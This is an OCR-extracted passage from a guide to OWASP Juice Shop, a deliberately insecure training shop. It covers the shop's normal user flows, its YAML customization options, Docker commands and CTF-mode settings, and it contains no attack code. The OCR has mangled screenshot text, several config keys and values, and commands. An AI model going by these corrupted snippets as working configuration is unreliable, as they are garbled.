precisely, to its alias #/search ). 


= (i owas Juice Shop 


All Products 


Apple Juice Banana Juice 
(1000m1) ec (1000mi) 
199 Ue 4.99 


Eggfruit Juice Green Juice Shop 
(600m) RES Smoothie ‘Artwork 
ago bt 4.99 27874 


This is of course the "bread & butter" screen for any e-commerce site. When you 





click on the small "eye"-button next to the price of a product, an overlay screen 
will open showing you that product details including a list of customer reviews for 
that product (if available). You can also enter a new (or edit an existing) product 
review in this dialog. Authenticated users can upvote reviews they like. 
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OWASP Juice Shop 
LEEA ELON 
(16pcs) 


Get one of these tem ry 

to proudly wear the OWASP Juice 
Shop or CTF Extension logo on your 
skin! If you tweet a photo of yourself 
with the tattoo, you get a couple of 


Please mention 


Reviews (1) 


mc.safesearch@juice-sh.op 
| straight-up gots nuff props fo'these tattoos! 


)-Saft) 


X Close 0.01 





You can use the Search... box in the navigation bar on the top of the screen to 
filter the table for specific products by their name and description. Using the 
controls at the bottom of the table, you can navigate through a the result list that 
exceeds the /tems per page limit. 


= Moms Juice Shop X @ Account W your Basket @ EN 


Search Results - ora 


OWASP Juice OWASP Neo OWASP SSL 


. | Shop Advanced 
Shop Sticker Í Temporary Forensic Tool 
age Tattoos (16pcs) (O-Saft) 


9.99 14.99 0.01 


Add to Basket Add to Basket Add to Basket 


Orange Juice 
(1000m!) 





User login 


You might notice that there seems to be no way to actually purchase any of the 
products. This functionality exists, but is not available to anonymous users. You 
first have to log in to the shop with your user credentials on the #/login page. 
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There you can either log in with your existing credentials (if you are a returning 
customer) or with your Google account. 


Login 


Email 


local horst@123.com 


=>] Log in 


C] Remember me 


G Log in with Google 





User registration 


In case you are a new customer, you must first register by following the 
corresponding link on the login screen to #/register . There you must enter your 
email address and a password to create a new user account. With these 
credentials you can then log in... and finally start shopping! During registration you 
also choose and answer a security question that will let you recover the account if 
you ever forget your password. 
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User Registration 


local.horst@ 


Password 


© Password must be 5-20 characters long 


Repeat Password 


Security Question 


© This cannot be changed later! 


Answer 





Forgot Password 


By providing your email address, the answer to your security question and a new 
password, you can recover an otherwise inaccessible account. 
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Forgot Password 


Email 


bjoem@owasp.org 


New Password 


@ Password must be 5-20 characters long. 


Repeat New Password 





Choosing products to purchase 


After logging in to the application you will notice a "shopping cart"-icon in every 
row of the products table. Unsurprisingly this will let you add one or more products 
into your shopping basket. The Your Basket button in the navigation bar will bring 
you to the #/basket page, where you can do several things before actually 
confirming your purchase: 


e increase ("+") or decrease ("-") the quantity of individual products in the 
shopping basket 
e remove products from the shopping basket with the "trashcan"-button 
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Your Basket (bjoern.kimminich@owasp.org) 


Image Product Price Quantity Total Price 


Raspberry Juice 
(1000ml) 


OWASP Juice 
Shop Temporary 
Tattoos (16pcs) 


OWASP Juice 
Shop-CTF Velcro 2.920 
Patch 


Pwning OWASP 


Juice Shop 


P Checkout 


You will gain 3 Bonus Points from this order! 





Checkout 


During checkout you will be guided through a series of steps to set your delivery 
address, desired delivery method and credit card. 
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Select an address 


Name Address 


Administrator 0815 Test Street, Test, Test, 4711 


Add New Address 


Delivery Address ee 
Administrator 

0815 Test Street, Test, Test, 4711 

Test 

Phone Number 1234567890 


Choose a delivery speed 


(oe) One Day Delivery 
Fast Delivery 


(oe) Standard Delivery 


Your saved cards 


Continue 
Card Number Name Expires On 


You can review this order before it is finalized. 
(oe) serene SEB, ‘Administrator 2/2081 
err aloe Administrator 4/2086 
Add new card Add a credit or debit card 


‘Add a coupon Add a coupon code to receive discounts 


Need a coupon code? Follow us on Twitte: ebook for monthly coupons and other spam! 
12345 


Other payment options 





Do not enter any real credit card or address data anywhere in the Juice 
Shop! Always remember that it is not a real shop and it is intentionally 
riddled with security and privacy flaws! 


In the Add a coupon section you can redeem a code for a discount. Unfold the 
Other payment options section to see links with donation and merchandise links 
of the Juice Shop open source project. 


Finally you can click the Checkout button to issue an order. You will be forwarded 
to a confirmation of your order right away. It also includes a link to a printable PDF 
confirmation for your order and as well as a tracking link. 
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GB OWASP Juice Shop Q account WE Your Basket @ EN 


Your order has been placed and is being processed, You can 


Order Summary 


You have gained 3 Bonus Points fre 


order_8194-6620311 600¢3317e pdf 


OWASP Juice Shop 


Order Confirmation 








Customer: bjoern.kimminich@owasp.org 
Order #: 8194-6c203f1600c33f7e 


Date: 2019-08-13 


1x Raspberry Juice (1000ml) ea. 4.99 = 4,992 
2x OWASP Juice Shop Temporary Tattoos (16pcs) ea. 14.99 = 29.980 
1x OWASP Juice Shop-CTF Velcro Patch ea. 2.92 = 2.928 


1x Pwning OWASP Juice Shop ea. 5.99 = 5.990 


Delivery Price: 0.992 
Total Price: 44.875 


Bonus Points Earned: 3 
(You will be able to these points for amazing bonuses in the future!) 





‘Thank you for your order! 


User Menu 


Clicking the user icon right next to the application logo & title, you will give you 
access to several secondary use cases of the Juice Shop. This menu is obviously 
only available when you are logged in with your user account. 


@ We will cover only a fraction of the available functionality from the user menu in 
the following sub-sections. It is recommended to explore the rest on your own 
before diving into any hacking exercises. 
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Q (3) Account Y Your Basket ® EN 


bjoern.kimminich@owasp.org 


®© 


My saved addresses 


My Payment Options 


Juice Shop Wallet 


ol © 


Order History 
Privacy Policy Privacy & Security 


Request Data Export Track Orders 


Oo FF B® © 


Request Data Erasure Recycle 


Change Password Logout 


© 


2FA Configuration 


Last Login IP 





User Profile 


Clicking you your email address in the user menu, you will get to the User Profile 
screen on /profile . Visiting it might break your user experience a bit, as it looks 
slightly less sophisticated than the rest of the shop's Ul. It is fully functional 
nonetheless, as it allows you to upload a Jpc -format picture of yourself (or link an 
existing Gravatar) and choose a username for your account. 


€ Back Goms Juice Shop 


User Profile 


File Upload: 


Upload Picture 


Gravatar URL: 


Link Gravatar 





My saved addresses 


This page lists your saved addresses and provides you with the ability to edit or 
delete already saved addresses. 
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Select an address 


Name Address 


Bjoern Kimminich ‘Am Lokalhorst 42, Uetersen, Schleswig-Holstein, 25436 


Add New Address 





Do not enter real address data here! 


My Payment Options 


This page lists your saved cards and provides you with the ability to delete 
already saved cards or to add new ones. 


Your saved cards 


Card Number Expires On 


nae alas TE Bjoern Kimminich 12/2092 


Add new card Add a credit or debit card 


Card Number 


Expiry Month * Expiry Year * 





Do not enter real credit card data here! 


Juice Shop Wallet 


This page allows you to add money to your wallet and to check the existing 
balance. All the bonuses on your purchase are directly credited to your wallet. 
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Juice Shop Wallet 


Add Money 


Wallet Balance: 


Amount 





Order History 


This page allows you to view the details of all your current and previous orders 
and the status of their delivery. 


Boms Juice Shop coount E Your Basket @ EN 


Order History 


Puming OWASP Juice Shop 


Order ID 
#8194-d0560b01¢c612670 





Privacy Policy 


This page informs you about the policies regarding the collection, use and 
disclosure of personal data when you use the OWASP Juice Shop and the 
choices you have when it comes to your data. 
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= OB owase Juice shop Q Qaccount W Your Basket @ EN 


Privacy Policy 
Effective date: March 15, 2019 
OWASP Juice Shop ("us "we", or "our') operates the htip//ocaihost website (the "Servios'}. 


This page informs you of our policies regarding the collection, use, and disclosure of personal data when you use our Service and the choices you have associated with that data. Our Privacy Policy for 
OWASP Juice Shop is created with the help of the Free Pri 


We use your data to provide and improve the Service. By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy 
Policy, terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, accessible from http:/ocalhost 

A. Information Collection And Use 

We collect several diferent types of information for various purposes to provide and improve our Service to you. 

A1. Types of Data Collected 

A1.1 Personal Data 


While using our Service, we may ask you to provide us with certain personally identifiable information that can be used to contact or identify you ("Personal Data’). Personally identifiable information 
ide, but is not limited to: 


all address 
+ Address, Stata, Province, ZIP/Postal code, City 
+ Cookies and Usage Data 


A1.2 Usage Data 


We may also collect information how the Service is accessed and used ("Usage Data"). This Usage Data may include information such as your computer's Internet Protocol address (e.g. IP address), 
browser type, browser version, the pages of our Service that you visit, the time and date of your visit, the time spent on those pages, unique device identifiers and other diagnostic data, 


1.3 Tracking & Cookies Data 


We use cookies and similar tracking technologies to track the activity on our Service and hold certain information. 





Cookies are files with small amount of data which may include an anonymous unique identifier. Cookies are sent to your browser from a website and stored on your device, Tracking technologies also. 
used are tags, and scripts to collect and track information and to improve and vice. 


Request Data Export 


This page allows you to obtain a copy of all your data saved in the Juice Shop. 


Request Data Export 


= EN 


Export Format: (®) JSON (_) PDF 


CAPTCHA: Hape dl 
tn 


Enter CAPTCHA 


(Your data export will open in a new Browser window.) 





Request Data Erasure 


This page allows you to request a complete erasure of your account and any 
associated data from the Juice Shop. 
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Data Erasure Request (Art. 17 GDPR) 


We take data security, customer privacy, and legal compliance very serious. In 
accordance with GDPR we allow you to request complete erasure of your 
account and any associated data. 


Request Data Erasure 





Change user password 


If you are currently logged in you will find the obligatory Change Password button 
in the navigation bar. On the #/privacy-security/change-password page you can then 
choose a new password. To prevent abuse you have of course to supply your 
current password to legitimate this change. 


Change Password 


New Password 


@ Password must be 5-20 characters long 


Repeat New Password 





2FA Configuration 


This page allows you to secure your account with an additional factor by providing 
you with a barcode to scan. 
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2FA Configuration 


Secure your account with an additional factor. Scan the QR code into an 
authenticator app supporting TOTP (e.g. Google Authenticator) to get started. 


Current Password 


Initial Token 





Last Login IP 


This page displays the IP from which your account was last logged in. 


Last Login IP 


IP Address 127.0.0.1 





Request Recycling Box 


When logged in you will furthermore see a Recycle button that brings you to the 
#/recycle page. This is a very innovative feature that allows eco-friendly 
customers to order pre-stamped boxes for returning fruit pressing leftovers to the 
Juice Shop. 
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You hug trees. We save money. Win-win! 


Request Recycling Box 


Lorem ipsum dolor sit amet, consetetur sadipscing elitr, 
sed diam nonumy eirmod tempor invidunt ut labore et 
dolore magna aliquyam erat, sed diam voluptua. At 


vero eos et accusam et justo duo dolores et ea rebum. 
Quantity 


100 


Stet clita kasd gubergren, no sea takimata sanctus est 
Lorem ipsum dolor sit amet. Lorem ipsum dolor sit 
Select an address amet, consetetur sadipscing elitr, sed diam nonumy 
eirmod tempor invidunt ut labore et dolore magna 


Address aliquyam erat, sed diam voluptua. 


p Am Lokalhorst 42, 
Bjoern 5 
(©) Kimminich Uetersen, Schleswig- Germany 
Holstein, 25436 





For greater amounts of pomace the customer can alternatively order a truck to 
come by and pick it up at a chosen future date. 


Request Recycling Box 


Quantity 


1000 


Select an address 


Address Country 


Am Lokalhorst 42, Uetersen, 


a ee 
joomine Chiang Holsteins 25436 


Germany 


Pickup Date 


11/30/2019 


Please pickup at above address instead of sending a recycle box. 


A Submit 





Order Tracking 


Equipped with an order number from your confirmation PDF, you can invoke the 
#/track-order functionality by clicking Track Orders. 
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Track Orders 


Order ID 


8194-d0560b01cc612b70 


@ Track 





After entering a valid order number, you will be shown the products from your 
order along with a delivery status and expected delivery date. 


Search Results - 8194-d0560b01cc612b70 


Expected Delivery 


TE 


Product Quantity Total Price 


Ordered products 


Raspberry Juice (1000ml) 4.990 


OWASP Juice Shop 


4. 
Temporary Tattoos (16pcs) We 


OWASP Juice Shop-CTF 


Velcro Patch 2920 


Pwning OWASP Juice Shop 5.990 


Bonus Points Earned: 3 


(You will be able to redeem these points for amazing bonuses in the future!) 





Just as there was no "real" payment was happening, you will hopefully 
understand that there is no "real" order delivery happening - no matter what the 
order tracking dialog suggested. 


Menu 


The sidebar menu button left of the application logo reveals some more options to 
choose from. 


46 


OWASP Juice Shop 


a Customer Feedback 
A Complain 
Company 


= About Us 
Apple Juice 
(1000m) 


1.995 


& Photo Wall 


= Deluxe Membership 


©) GitHub 


Add to Basket 


OWASP Juice Shop 
v9.0.0-SNAPSHOT 


Ozma » 





Customer Feedback 


Customers are invited to leave feedback about their shopping experience with the 
Juice Shop. Simply visit the #/contact page by clicking the Customer Feedback 
menu item. You might recognize that it is also possible to leave feedback as an 
anonymous user. The contact form is very straightforward with a free text 
Comment field and a Rating on a 1-5 stars scale. To prevent abuse, you have to 
solve a simple mathematical problem before being allowed to submit your 
feedback. 
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Customer Feedback 


Comment 


Best shop ever! 


© Max 160 characters 


Rating i a * * 4 


CAPTCHA: Whatis 6+10*5 ? 





Complain 


The Complain? menu item is shown only to logged in users. It brings you to the 
#/complain page where you can leave a free text Message and also attach an 
Invoice file in case you had some issues with a recent order at the Juice Shop. 


Complain 


@ Max 160 characters 


Ties Datei auswahlen DEUCES CVE 





About Us 


Like every proper enterprise, the OWASP Juice Shop has of course an #/about 
page titled About Us. There you find a summary of the interesting history of the 
shop along with a link to its official Terms of Use document. Additionally the page 
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displays a fancy illustrated slideshow of all customer feedback. Beneath that you 
can find all important social media contact information of the shop. 


= (J owas Juice Shop 


About Us 


Corporate History & Pe 


Noting useful avatabiehesed 
tirit 


Fallow us on 





Oret Pest 


Photo Wall 


The OWASP Juice Shop also has an #/photo-wa11 page titled Photo Wall which 
allows its users to share their memories with other customers of the Juice Shop. 


Photo Wall 


No results found 


No memories have been shared yet. 


Share a Memory 


Pick Image 


Caption 





Deluxe Membership 


The OWASP Juice Shop offers a deluxe membership to its customers which 
provides them with exclusive offers, free fast delivery and an unrestricted 
purchase of the items they like. 
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5 i 


y a Deluxe Membership 


|, = Enjoy amazing benefits on being a deluxe customer of OWASP Juice Shop. Check out what's included with 
5 your membership. 
š 
em 490 
be Become amember 
k § 


Deels ond Onors Free Fast Delivery Unlimited Purchase 
As a deluxe member, get accses Get unlimited Free Fast Delivery Enjoy unrestricted purchase on 
to exclusive deals and irresistible > 
across all products in the shop. your favourite products. 


offers. 





Language selection 


From a dropdown menu in the navigation bar you can select a multitude of 
languages you want the user interface to be displayed in. Languages marked with 
a "flask"-icon next to them offer only rudimentary or partial translation. 


Azərbaycanca 
m Bahasa Indonesia 
Catalan 
™ Česky 
+ Dansk 


Banana Juice 
(1000ml) 4 Deutsch 


1.99 
= Eesti 


=K = English 


Español 





If you want to know more about (or even help with) the localization of OWASP 
Juice Shop, please refer to the Help with translation chapter in part III of this book. 


1 
https://www.owasp.org/index.php/Map_execution_paths_through_applicatio 
n_(OTG-INFO-007) e 


2 http://xunitpatterns.com/happy%20path.html © 
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Customization 


One of the core usage scenarios for OWASP Juice Shop is in employee trainings 
in order to facilitating security awareness. With its not entirely serious user roster 
and product inventory the application might not be suited for all audiences alike. 


In some particularly traditional domains or conservative enterprises it would be 
beneficial to have the demo application look and behave more like an internal 
application. 


OWASP Juice Shop can be customized in its product inventory and look & feel to 
accommodate this requirement. It also allows to add an arbitrary number of fake 
users to make demonstrations - particularly those of unron-saL injection attacks - 
even more impressive. Furthermore the Challenge solved!-notifications can be 
turned off in order to keep the impression of a "real" application undisturbed. 


How to customize the application 


The customization is powered by a YAML configuration file placed in /config . To 
run a customized OWASP Juice Shop you need to: 


1. Place your own .ym1 configuration file into /config 
2. Set the environment variable nope_env to the filename of your config without 
the .ym1 extension 
o On Windows: set NODE_ENV=nameOfYourConfig 
o On Linux: export NODE_ENV=nameOfYourConfig 


3. Run npm start 


You can also run a config directly in one command (on Linux) via 
NODE_ENV=nameOfYourConfig npm start . By default the config/default.yml config is 
used which generates the original OWASP Juice Shop look & feel and inventory. 
Please note that it is not necessary to run npm install after switching 
customization configurations. 


Overriding default.yml in Docker container 


In order to override the default configuration inside your Docker container with 
one of the provided configs, you can pass in the nope_Env environment variable 
with the -e parameter: 


docker run -d -e "“NODE_ENV=bodgeit" -p 3000:3000 


In order to inject your own configuration, you can use -v to mount the 
default.ym1 path inside the container to any config file on your outside file 
system: 


docker run -d -e "“NODE_ENV=myConfig" -v /tmp/myConfig.yml: /juice-shop/config/myConfig. 


> 
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YAML configuration file 


The YAML format for customizations is very straightforward. Below you find its 


syntax along with an excerpt of the default settings. 


e server 


o 


port to launch the server on. Defaults to 3009 


e application 


o 


o 


o 


domain used for all user email addresses. Defaults to 'juice-sh.op' 

name as shown in title and menu bar Defaults to 'owasP Juice Shop' 

logo filename in frontend/dist/frontend/assets/public/images Ora URL of 
an image which will first be download to that folder and then used as a 
logo. Defaults to JuiceShop_Logo.png 

favicon filename in frontend/dist/frontend/assets/public Ora URL of an 
image in .ico format which will first be download to that folder and then 
used as a favicon. Defaults to favicon_v2.ico 

theme the name of the color theme used to render the UI. Options are 
bluegrey-lightgreen , blue-lightblue , deeppurple-amber , indigo-pink , 
pink-bluegrey , purple-green and deeporange-indigo . Defaults to 
bluegrey-lightgreen 

showChallengeSolvedNotifications shows or hides all instant "challenge 
solved"-notifications. Recommended to set to false for awareness 
demos. Defaults to true . 

showChallengeHints shows or hides hints for each challenge on hovering 
over/clicking its "unsolved" badge on the score board. Defaults to true . 
showVersionNumber Shows or hides the software version from the title. 
Defaults to true . 

showHackingInstructor shows or hides Hacking Instructor buttons on the 
Score Board and in the Welcome Banner. Defaults to true . 
showGitHubLinks shows or hides the "GitHub" button in the navigation and 
side bar as well as the info box about contributing on the Score Board. 
Defaults to true . 

numberOfRandomFakeUsers represents the number of random user accounts 
to be created on top of the pre-defined ones (which are required for 
several challenges). Defaults to ə , meaning no additional users are 
created. 

twitterUrl used as the Twitter link promising coupon codes on the 
About Us and Your Basket screen. Defaults to 

‘https: //twitter.com/owasp_juiceshop' 

facebookUr1 used as the Facebook link promising coupon codes on the 
About Us and Your Basket screen. Defaults to 

“https: //www.facebook.com/owasp.juiceshop' 

slackUr1 used as the Slack link on the About Us screen. Defaults to 
"http: //owaspslack.com' 

pressKitUrl used as the link to logos and media files on the About Us 
screen. Defaults to ‘https: //github.com/OWASP/owasp- 
swag/tree/master/projects/juice-shop' 

planetOverlayMap filename in frontend/dist/frontend/assets/private Of 


URL of an image to download to that folder and then use as an overlay 
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texture for the 3D planet "easter egg". Defaults to orangemap2k. jpg 
o planetName of the 3D planet "easter egg" as shown in the page title. 
Defaults to Orangeuze 
o deluxePage Custom elements on the Deluxe Membership page 
m deluxeDeliveryImage filename in 
frontend/dist/frontend/assets/public/images/deluxe Ofa URL of an 
image which will first be download to that folder and then displayed 
on the Deluxe Membership page. Defaults to delivery _juiceshop.png . 
© recyclePage Custom elements on the Request Recycling Box page 
= = topProductImage filename in 
frontend/dist/frontend/assets/public/images/products to use aS the 
image on the top of the info column on the page. Defaults to 
fruit_press.jpg 
m ~=bottomProductImage filename in 
frontend/dist/frontend/assets/public/images/products to use aS the 
image on the bottom of the info column on the page. Defaults to 
apple_pressings. jpg 
© altcoinName defines the name of the (fake) crypto currency that is 
offered on the Token Sale screen. Defaults to juicycoin 
© welcomeBanner defines a dismissable welcome banner that can be shown 
when first visiting the application. 
m showOnFirstStart Shows or hides the banner. Defaults to true . 
= title defines the headline of the banner. Defaults to welcome to 
OWASP Juice Shop! . 
= message defines the body of the banner. Can contain arbitrary 
HTML. Defaults to <p>Being a web application with a vast number of 
intended security vulnerabilities, the <strong>OWASP Juice Shop</strong> 
is supposed to be the opposite of a best practice or template application 
for web developers: It is an awareness, training, demonstration and 
exercise tool for security risks in modern web applications. The 
<strong>OWASP Juice Shop</strong> is an open-source project hosted by the 
non-profit <a href='https://owasp.org' target='_blank'>Open Web 
Application Security Project (OWASP)</a> and is developed and maintained 
by volunteers. Check out the link below for more information and 
documentation on the project.</p><h1><a href='http://owasp-juice.shop' 
target="_blank’ >http://owasp-juice.shop</a></h1> 
© cookieConsent defines the cookie consent dialog shown in the bottom 
right corner 
= backgroundcolor of the cookie banner itself. Defaults to '#546e7a' 
=m textColor Of the message shown in the cookie banner. Defaults to 
"HEFFFFE 
= buttoncolor defines the color of the button to dismiss the banner. 
Defaults to '#558b2f' 
m buttonTextColor Ofthe dismisstext on the button. Defaults to 
'#fffFFFF' 
= message explains the cookie usage in the application. Defaults to 
'This website uses fruit cookies to ensure you get the juiciest tracking 


experience. ' 
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= dismissText the text shown on the button to dismiss the banner. 
Defaults to ‘Me want it!" 
= linkText is shown after the message to refer to further information. 
Defaults to ‘But me wait!' 
= linkurl provides further information about cookie usage. Defaults 
to ‘https://www. youtube. com/watch?v=9PnbKL 3wuH4 ' 
© privacyContactEmail the email address shown as contact in the Privacy 
Policy. Defaults to donotreply@owasp-juice.shop 
o securityTxt defines the attributes for the security.txt file based on the 
https://securitytxt.org/ Internet draft 
= contact an email address, phone number or URL to report security 
vulnerabilities to. Can be fake obviously. Defaults to 
mailto: donotreply@owasp-juice.shop 
= encryption URL to a public encryption key for secure 
communication. Can be fake obviously. Defaults to 
https://keybase.io/bkimminich/pgp_keys.asc? 
fingerprint=19c01cb7157e4645e9e2c863062a85a8cbfbdcda 
= acknowledgements URL a "hall of fame" page. Can be fake obviously. 
Defaults to /#/score-board 
© promotion defines the attributes required for the /promotion screen 
where a marketing video with subtitles is rendered that hosts the XSS 
Tier 6 challenge 
= video name ofa file with video/mp4 content type in 
frontend/dist/frontend/assets/public/videos Or URL of an image to 
download to that folder and then use as the promotion video. 
Defaults to JuiceShopJingle.mp4 
= subtitles name of a Web Video Text Tracks Format file in 
frontend/dist/frontend/assets/public/videos Or URL of an image to 
download to that folder and then use as the promotion video. 
Defaults to JuiceShopJingle.vtt 
e challenges 
© safetyOverride enables all potentially dangerous challenges regardless 
of any harm they might cause when running in a containerized 
environment. Defaults to false 
© overwriteUr1lForProductTamperingChallenge the URL that should replace the 
original URL defined in uriForProductTamperingChallenge for the Product 
Tampering challenge. Defaults to https://owasp.slack.com 
e products list which, when specified, replaces the entire list of default 
products 
o name of the product (mandatory) 
© description of the product (optional). Defaults to a static placeholder 
text 


o 


price of the product (optional). Defaults to a random price 

© image (optional) filename in 
frontend/dist/frontend/assets/public/images/products Or URL of an image 
to download to that folder and then use as a product image. Defaults to 
undefined. png 
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o deletedDate of the product in yyvy-mm-pp format (optional). Defaults to 
null . 
© urlForProductTamperingChallenge sets the original link of the product which 
is the target for the Product Tampering challenge. Overrides deletedDate 
with null (must be defined on exactly one product) 
©  useForChristmasSpecialcChallenge marks a product as the target for the 
"christmas special" challenge. Overrides deletedDate with 2014-12-27 
(must be true on exactly one product) 
© fileForRetrieveBlueprintChallenge (must be true on exactly one product) 
filename in frontend/dist/frontend/assets/public/images/products Or URL of 
a file download to that folder and then use as the target for the Retrieve 
Blueprint challenge. If a filename is specified but the file does not exist in 
frontend/dist/frontend/assets/public/images/products the challenge is still 
solvable by just requesting it from the server. Defaults to juiceshop.st1 . 
@ To make this challenge realistically solvable, include some kind of hint 
to the blueprint file's name/type in the product image (e.g. its Exif 
metadata) or in the product description 
© keywordsForPastebinDataLeakChallenge (must be defined on exactly one 
product) list of keywords which are all mandatory to mention in a 
feedback or complaint to solve the DLP Tier 1 challenge. Overrides 
deletedDate with 2019-02-1 . @ To make this challenge realistically 
solvable, provide the keywords on e.g. PasteBin in an obscured way that 
works well with the "dangerous ingredients of an unsafe product"" 
narrative 
o reviews a Sub-list which adds reviews to a product (optional) 
= text of the review (mandatory) 
= author of the review from the following list of pre-defined users in 
the database: admin , jim, bender , ciso , support , morty , amy, 
mc.safesearch , J12934 , wurstbrot OF bjoern (mandatory) 
e ctf 
o showFlagsInNotifications shows or hides the CTF flag codes in the 
"challenge solved"-notifications. Is ignored when 
application. showChallengeSolvedNotifications is set to false . Defaults to 
false 
© showCountryDetailsInNotifications determines if the country mapped to 
the solved challenge is displayed in the notification. Can be none , name , 
flag Or both . Only useful for CTFs using FBCTF. Defaults to none 
© countryMapping list which maps challenges to countries on the challenge 
map of FBCTF. Only needed for CTFs using FBCTF. Defaults to empty 


m = <challengeName> 
= name the name of the country 
= code the two-letter ISO code of the country 


Configuration example 
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server: 
port: 3000 
application: 
domain: juice-sh.op 
name: ‘OWASP Juice Shop‘ 
logo: JuiceShop_Logo.png 
favicon: favicon_v2.ico 
theme: bluegrey-lightgreen 
showChallengeSolvedNotifications: true 
showChallengeHints: true 
showVersionNumber: true 
showHackingInstructor: true 
showGitHubLinks: true 
numberOfRandomFakeUsers: 0 
twitterUrl: ‘https://twitter.com/owasp_juiceshop' 
facebookUrl: ‘https://www.facebook.com/owasp.juiceshop* 
slackUrl: ‘http://owaspslack.com' 
planetOverlayMap: orangemap2k.jpg 
planetName: Orangeuze 
deluxePage: 
deluxeDeliveryImage: delivery_juiceshop.png 
recyclePage: 
topProductImage: fruit_press.jpg 
bottomProductImage: apple_pressings.jpg 
altcoinName: Juicycoin 
welcomeBanner: 
showOnFirstStart: true 
title: ‘Welcome to OWASP Juice Shop! 
message: "<p>Being a web application with a vast number of intended security vulne 
cookieConsent: 
backgroundColor: '#eb6c44' 
textColor: '#fffffF' 
buttonColor: '#f5d948' 
buttonTextColor: ‘#@00000' 
message: ‘This website uses fruit cookies to ensure you get the juiciest tracking 
dismissText: ‘Me want it!’ 
linkText: ‘But me wait!’ 
linkUrl: ‘https://www. youtube. com/watch?v=9PnbKL3wuH4 ' 
privacyContactEmail: donotreply@owasp-juice.shop 
securityTxt: 
contact: ‘mailto:donotreply@owasp-juice.shop' 
encryption: ‘https://pgp.mit.edu/pks/lookup?op=get&search=0x@62A85A8CBFBDCDA' 
acknowledgements: ‘/#/score-board' 
promotion: 
video: JuiceShopJingle.mp4 
subtitles: jingleSubtitles.vtt 
challenges: 
safetyOverride: false 
overwriteUrlForProductTamperingChallenge: ‘https://owasp.slack.com' 
products: 
name: ‘Apple Juice (100@m1) 
price: 1.99 
description: ‘The all-time classic.' 
image: apple_juice.jpg 
reviews: 


- { text: ‘One of my favorites!', author: admin } 


name: ‘OWASP SSL Advanced Forensic Tool (0-Saft)' 

description: 'O-Saft is an easy to use tool to show information about SSL certific 
price: 0.01 

image: orange_juice. jpg 

urlForProductTamperingChallenge: ‘https://www.owasp.org/index.php/0-Saft' 
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name: ‘Christmas Super-Surprise-Box (2014 Edition)’ 

description: ‘Contains a random selection of 10 bottles (each 500ml) of our tastie 
price: 29.99 

image: undefined. jpg 

useForChristmasSpecialChallenge: true 


name: ‘OWASP Juice Shop Sticker (2015/2016 design) 

description: ‘Die-cut sticker with the official 2015/2016 logo. By now this is a r 
price: 999.99 

image: sticker.png 

deletedDate: '2017-04-28' 


name: ‘OWASP Juice Shop Logo (3D-printed)' 
description: ‘This rare item was designed and handcrafted in Sweden. This is why i 
price: 99.99 
image: 3d_keychain. jpg 
fileForRetrieveBlueprintChallenge: JuiceShop.stl 
F OR bys CORRS 
Ctf 
showFlagsInNotifications: false 
showCountryDetailsInNotifications: none 
countryMapping: ~ 


Overriding default settings 


When creating your own YAML configuration file, you can rely on the existing 
default values and only overwrite what you want to change. The provided 
config/ctf.yml file for capture-the-flag events for example is as short as this: 


application: 
logo: JuiceShopCTF_Logo. png 
favicon: favicon_ctf.ico 
showChallengeHints: false 
showVersionNumber: false 
showHackingInstructor: false 
showGitHubLinks: false 
deluxePage: 
deluxeDeliveryImage: delivery_ctf.png 
welcomeBanner: 
showOnFirstStart: false 
Gtk: 


showFlagsInNotifications: true 


Testing customizations 


To verify if your custom configuration will not break any of the challenges, you 
should run the end-to-end tests via npm run protractor . If they pass, all challenges 
will be working fine! 


Provided customizations 


The following three customizations are provided out of the box by OWASP Juice 
Shop: 


57 


e 7 Minute Security: Full conversion https://7ms.us-theme for the first podcast 
that picked up the Juice Shop way before it was famous! 

e Mozilla-CTF: Another full conversion theme harvested and refined from the 
Mozilla Austin CTF-event! 0 

e The Bodgelt Store: An homage to our server-side rendered ancestor. May it 
rest in JSPs! ® 

e CTF-mode: Keeps the Juice Shop in its default layout but disabled hints while 
enabling CTF flag codes in the "challenge solved"-notifications. Refer to 
Hosting a CTF event to learn more about running a CTF-event with OWASP 
Juice Shop. P 

e Quiet mode: Keeps the Juice Shop in its default layout but hides all 
"challenge solved"-notifications, GitHub ribbon and challenge hints. “> 

e OWASP Juice Box: If you find joosbäks much easier to pronounce than 
joosSHap, this customization is for you. O 


= Mozilla CTF 





All Products 














Firefox tattoo, Fox Plush 
50 pack ak 
aa: 
i 0 Ba 


{P} The Bodgelt Store Q Orom W voursaster @ EN 


All Products 

















Limitations 


e When running a customization (except default.ym1 ) that overwrites the 
property application.domain , the description of the challenges Ephemeral 
Accountant, Forged Signed JWT and Unsigned JWT will always be shown in 
English. 

e Configurations (except default.ym1 ) do not support translation of custom 
product names and descriptions as of v9.1.0. 
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Additional Browser tweaks 


Consider you are doing a live demo with a highly customized corporate theme. 
Your narrative is, that this really is an upcoming eCommerce application of that 
company. Walking the "happy path" might now lure you into two situations which 
could spoil the immersion for the audience. 


Coupon codes on social media 


If you configured the twitterur1 / facebookUr1 as the company's own 
account/page, you will most likely not find any coupon codes posted there. You 
will probably fail to convince the social media team to tweet or retweet some 
coupon code for an application that does not even exist! 


(O) Kuehne + Nagel Tweets Folge ich Follower Gefällt mir 
@KNLogistics 478 36 14,8 Tsd. 1 





Tweets Tweets & Antworten Medien 
Kuehne + Nagel 
@KNLogistics Kuehne + Nagel @KNLogistics - 11 Std v 
a k dlvri 
lieing bisinestecisonsiecreatie 1100 kilograms of bamboo per week dlvr.it/QXDss5 


supply chain, we turn logistics challenges vé: iii 
into competitive advantages. > x aS 
~ x F- 
‘ `y È 





© Global 
@& kn-portal.com 


Beigetreten November 2008 


E “ 2 und Videos 


ia 
7 





Q Qe Os 


Kuehne + Nagel @KNLogistics - 7. Juni v 
Kühne + Nagel und Bosch bauen ihre Zusammenarbeit weiter aus 
dlvr.it/QWWYRf 





OAuth Login 


Another immersion spoiler occurs when demonstrating the Log in with Google 
functionality, which will show you the application name registered on Google 
Cloud Platform: OWASP Juice Shop! There is no way to convince Google to show 
anything else for obvious trust and integrity reasons. 
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G Uber Google anmelden 


Anmeldung 
Weiter zu OWASP Juice Shop 


E-Mail oder Telefonnummer 


E-Mail-Adresse vergessen? 


Konto erstellen WEITER 


On-the-fly text replacement 


You can solve both of the above problems in your own Browser by replacing text 
on the fly when the Twitter, Facebook or Google-Login page is loaded. For 
Chrome Word Replacer |! is a plugin that does this work for you with very little 
setup effort. For Firefox FoxReplace does a similar job. After installing either 
plugin you have to create two text replacements: 


1. Create a replacement for owasp Juice Shop (as it appears on Google-Login) 
